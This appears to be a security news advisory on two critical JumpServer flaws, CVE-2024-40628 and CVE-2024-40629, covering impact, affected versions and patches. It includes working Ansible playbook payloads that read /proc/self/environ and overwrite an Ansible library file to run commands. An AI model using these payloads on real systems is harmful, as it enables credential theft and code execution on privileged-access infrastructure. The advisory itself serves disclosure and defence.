CVE-2024-40628 & CVE-2024-40629: Two Maximum Severity Flaws in JumpServer

JumpServer, a widely used open-source privileged access management (PAM) tool, has disclosed two critical vulnerabilities that could allow attackers to gain unauthorized access to sensitive systems and data. The vulnerabilities, identified as CVE-2024-40628 and CVE-2024-40629, both carry a CVSS score of 10, the highest possible severity rating.

Exploiting the Flaws

CVE-2024-40628 enables attackers to read arbitrary files within the JumpServer Celery container, potentially exposing sensitive information such as passwords, SSH keys, and database credentials. This vulnerability can be exploited by a low-privileged user with access to the Job Center feature.

Reproduction Steps:

1. Open Workbench > Job > Template section, create a malicious playbook template with the following content:
   

   - hosts: all
        tasks:
        - name: read file from local host = celery using file lookup plugin
          ansible.builtin.debug:
            msg: "{{ lookup('ansible.builtin.file', '/proc/self/environ') }}"
2. Open Workbench > Job > Job list section, create a new job with the playbook template created above.
3. Run the job

CVE-2024-40629 is even more severe, allowing attackers to write arbitrary files and execute code within the Celery container. This could lead to a complete compromise of the JumpServer instance and the systems it manages. Like CVE-2024-40628, this vulnerability can also be exploited by a low-privileged user with access to the Job Center.

Reproduction Steps:

1. Open Workbench > Job > Template section, create a malicious playbook template with the following content:
   

    - hosts: all
        tasks:
        - name: create python file on remote host that executes a command
          shell: |
            echo 'from ansible.release import __version__, __author__
            __import__("os").system("id > /tmp/pwnd")' > /tmp/rce
        - name: write that file at a known location that gets reloaded at the next
      ansible execution
          fetch:
            src: /tmp/rce
            dest: /opt/py3/lib/python3.11/site-packages/ansible/__init__.py
            flat: true
2. Open Workbench > Job > Job list section, create a new job with the playbook template created above.
3. Run the job, then run any other playbook and the command will be executed

Impact on Organizations

If exploited, these vulnerabilities could have devastating consequences for organizations that rely on JumpServer to manage privileged access to their critical systems. Attackers could steal sensitive data, disrupt operations, or even launch further attacks on other systems within the organization.

Who is Affected?

All JumpServer versions from v3.0.0 to v3.10.11 are vulnerable to both CVE-2024-40628 and CVE-2024-40629.

Mitigating the Risk

JumpServer has released patched versions v3.10.12 and v4.0.0 that address these vulnerabilities. All organizations using JumpServer are strongly urged to update to one of these patched versions immediately.

Related Posts:

• CVE-2024-29201 & CVE-2024-29202 Flaws Expose JumpServer Users to RCE Attacks
• CVE-2023-42442: JumpServer Session Replay Download Bug Without Authentication